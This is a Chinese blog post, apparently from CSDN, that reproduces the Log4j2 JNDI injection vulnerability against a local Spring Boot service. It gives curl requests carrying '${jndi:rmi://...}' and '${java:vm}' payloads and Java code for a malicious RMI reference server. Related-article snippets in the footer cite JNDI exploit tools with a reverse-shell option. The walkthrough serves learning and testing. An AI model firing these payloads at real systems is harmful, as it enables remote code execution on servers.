log4j漏洞复现

最新推荐文章于 2024-05-02 04:31:17 发布
最新推荐文章于 2024-05-02 04:31:17 发布
阅读量567 收藏
点赞数
分类专栏: Java基础 Java进阶 文章标签: java spring boot 微服务
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013121873/article/details/122038526
版权

最近出现的log4j漏洞问题,抱着好奇的心态来重现下。

环境搭建及测试代码

本文采用的是SpringBoot 2.2.6版本加一个RMI服务重现BUG,方式是通过在微服务工程里打log日志,以触发远程服务调用漏洞。

省略搭建微服务的过程,我使用的是社区版idea 2020.3.4,大家同样使用社区版的话,建议安装Spring assistant插件,可以很方便的搭建Springboot工程。

因为目前已经有了新版本的修复,这里建议大家使用Springboot2.2.6.RELEASE版本,其中带的log4j版本是2.12,这个版本是存在漏洞的哈。

项目依赖

<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
    <version>2.2.6.RELEASE</version>
    <exclusions>
        <exclusion>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-logging</artifactId>
        </exclusion>
    </exclusions>
</dependency>
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-log4j2</artifactId>
    <version>2.2.6.RELEASE</version>
</dependency>

log记录

之后可以创建你的测试接口了。一个简单的测试用例,用log来记录入参,并返回参数。

private static final Logger logger = LogManager.getLogger(TestLog4JController.class);
@PostMapping(value = "hack")
public Object testLog4J(@RequestBody String params) {
    logger.info("params: {}",params);
    return params;
}

打印JVM参数

先来打印一下jvm参数到控制台。通过${java:vm}该参数在log中打印,log4j会将我们的jvm参数打印出来,这个问题不会导致严重的问题,但是可以让我们见识了log4j并不是简单的帮我们记录日志。

@request
curl --location --request POST 'http://127.0.0.1:8080/hack' \
--header 'Content-Type: application/json' \
--data-raw '{
    "command":"${java:vm}"
}'

日志输出

2021-12-20 12:02:27.549  INFO 71326 --- [nio-8080-exec-1] c.a.l.c.TestLog4JController              : params: {
    "command":"Java HotSpot(TM) 64-Bit Server VM (build 25.231-b11, mixed mode)"
}

远程服务调用

接下来我们先来构建一个远程服务,之后通过打印log日志来发起远程调用。

RMI服务创建

public static void main(String[] args) {
    try {
        LocateRegistry.createRegistry(1099);
        Registry registry = LocateRegistry.getRegistry();
        Reference reference = new Reference("com.away.log4j.impl.Execute",
                "com.away.log4j.impl.Execute", null);
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        System.out.println("service started");
        registry.bind("hack", referenceWrapper);
    } catch (RemoteException | NamingException | AlreadyBoundException e) {
        e.printStackTrace();
    }
}

public class Execute {
    public Execute() {
        System.out.println("Execute");
    }

    static {
        // 代码执行到这里,表示RMI调用成功
        System.out.println("freedom, can do anything!");
    }
}

上面的程序是构建远程服务,当你打印log日志的时候,可以通过JNDI发起一个远程调用,那么一旦服务调用发起,我们的程序就很可能遭受意外的攻击。

调用示例:

@request
curl --location --request POST 'http://127.0.0.1:8080/hack' \
--header 'Content-Type: application/json' \
--data-raw '{
    "command":"${jndi:rmi://127.0.0.1:1099/hack}"
}'

结果输出:

以上是一个简单的调用示例,通过RMI调用到目标主机,并实例化一段代码。可想而知,我们平时只是打印一个普通日志,却引来这么严重的问题,真的是不可思议。

RomanticMachine
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 log4j漏洞
jazzz98的博客
06-19 3731
log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。
Log4j漏洞补救 Log4j2 + SLF4j 升级到最新版本
热门推荐
zhaofuqiangmycomm的博客
01-26 1万+
原创:Log4j2 + SLF4j打造日志系统 - 云+社区 - 腾讯云 2019-01-15阅读2.3K0 目录 一:前言 二:添加依赖 2.1:去除直接和间接依赖的log4j1和SLF4j 2.2:添加依赖 三:xml配置 3.1:log4j2.xml常用demo 3.2:demo的优点 3.3:内容详解 3.4:demo变形 3.4.1:同步打印日志 3.4.2:全部异步打印日志 3.4.3:混合模式打印日志 四:其他 4.1:Log日.
log4j漏洞log4j 1.x漏洞依赖包解决方案
你的博客
05-05 4081
那么自己的程序中确定是没有引用了,那log4j的引用必定是程序中的第三方依赖包了。如果觉得上面办法比较麻烦,也并不适合自己的场景,还有一个办法,这个办法只能躲过扫描,并未实际解决log4j漏洞问题,那就是将引入的log4j 1.2.17的包中的版本去改掉,直接修改配置中的版本号,就能躲过扫描。对于应用中我们自己写的程序全部替换为新版本。考虑了很久,某时灵光一闪,既然没有log4j的引用类,那么就在程序中创建这些类吧,这样log4j的几个自定义类仍然可以被其他包引用,而应用中又不需要引用log4j的原始包。
log4j2远程代码执行漏洞原理与漏洞(基于vulhub,保姆级的详细教程)_log4j漏洞(1)
最新发布
2401_84281601的博客
05-02 33
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://刚才http服务的地址:端口号/#Exploit” 1389。java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “构造反弹shell的命令的base64编码” -A “攻击机ip”java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 攻击机ip。
log4j日志实警告slf4j-log4j12和log4j-slf4j-impl
atarik@163.com
10-18 3830
因为各种三方库依赖的log4j实不同,所以可能会出找到多个log4j实的警告,但是不影响程序(logback是会影响的),如下: SLF4J: Class path contains multiple SLF4J bindings. SLF4J: Found binding in [jar:file:/D:/software/slf4j-log4j12-1.7.2.jar!/org/slf4j/impl/StaticLoggerBinder.class] SLF4J: Found bind
Log4j2 漏洞与解决方案】
m0_46459413的博客
12-29 495
这本是个不常用的插件,但代码触发到的频率很高,高到你代码中每次触发info,warn,error 等日志写入的时候,都会去校验一下是否执行Lookup的逻辑。如果用你的主机,远程调用我启动的破坏代码(应用服务)呢,这时候你的服务主机就是案板上的肉了,任人宰割。Log4j2 bug的破坏方式是什么,其实很简单,就是类似于SQL注入,这个更厉害,直接是代码注入,代码执行权限自然相当于应用权限。有的项目,可能依赖较为杂,且不方便重新编译,可以直接在运行时,添加以下JVM参数,这样可以禁止Lookup生效。
Apache Log4j漏洞
江湖事,技术了
12-14 1162
Apache Log4j漏洞 原因 阿里云安全团队发Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。 Apache 官方发布漏洞 https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-3201?filter=allissues 影响范围 Spring-Boot-strater-log4j2 Apache Struts2 Apache Solr Ap
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞
今天是几号的博客
04-12 2641
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
Log4j2漏洞(二)3种方式反弹shell
02-08 1474
Log4j2漏洞(二)3种方式反弹shell,有对环境要求苛刻的、有步骤多的、也有简单易的,时按需要选择,如果是学习我建议都学习下。
完整log4j漏洞
追风筝的摆渡人
12-30 2947
log4j2.X漏洞
Apache log4j2 远程命令执行漏洞及修方案
杨小熊学习笔记
12-14 6406
1. 漏洞信息 漏洞软件: Apache Log4j2 漏洞编号:CVE-2021-44228 漏洞描述:Apache Log4j2 远程命令执行 时间:2021-11-26 漏洞详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 漏洞影响范围版本:2.0.beta9 to 2.14.1 2. 排查指导 查看引用了 log4j-api 和 log4j-core 两个jar包,如maven依赖: <depend
Log4j过程
weixin_50339832的博客
12-26 2377
log4j是一个记录日志的组件,用来对程序状态进行动态记录, logger.info("system propety: ${jndi:schema://url}"); jndi:jndi解析器通过jdk获取内容,反序列化为java对象作为jndi, 并打印,jndi就是这个从外部查找得到的java对象。 schema:获取方式,jdk支持多种不同的查找方式,包括 corbname, dns, iiop, iiopname, ldap, ldaps, rmi 因ldap写法简单,被作为常用的获取方式
log4j漏洞vulhub靶场
08-14
要在 Vulhub 靶场中 log4j 漏洞,你可以按照以下步骤进行操作: 1. 安装 Docker 和 Docker Compose:确保你的系统已经安装了 Docker 和 Docker Compose 工具。 2. 克隆 Vulhub 仓库:在命令行中执行以下命令,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值